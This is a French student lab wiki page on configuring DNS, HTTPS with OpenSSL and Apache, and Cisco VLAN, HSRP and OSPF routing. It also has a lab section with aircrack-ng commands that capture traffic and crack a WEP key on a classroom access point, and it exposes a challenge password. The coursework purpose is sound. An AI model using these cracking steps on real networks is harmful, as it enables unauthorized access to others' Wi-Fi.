         7200    ; Refresh (2h)&lt;br /&gt;
         3600    ; Retry (1h)&lt;br /&gt;
         1209600 ; Expire (14j)&lt;br /&gt;
         7200    ; Minimum TTL (2h)&lt;br /&gt;
     @    IN NS  dns.ima2a5-rex4ever.site.    &amp;lt;= nom du dns ima2a5&lt;br /&gt;
     @    IN NS  ns6.gandi.net.               &amp;lt;= nom du dns de gandi&lt;br /&gt;
     dns  IN A   193.48.57.163                &amp;lt;= ip du dns ima2a5&lt;br /&gt;
     www  IN A   193.48.57.163                &amp;lt;= ip du site web&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
